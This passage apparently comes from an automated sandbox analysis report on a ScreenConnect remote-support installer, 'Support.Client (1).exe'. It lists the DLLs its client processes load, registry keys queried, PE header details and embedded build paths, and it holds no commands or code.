                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\Support.Client (1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Support.Client (1).exeStatic PE information: certificate valid
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Support.Client (1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Support.Client (1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client (1).exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA938000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1964904013.0000000000D02000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2932709226.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024038339.0000000000BC0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1953021568.0000000000D7D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
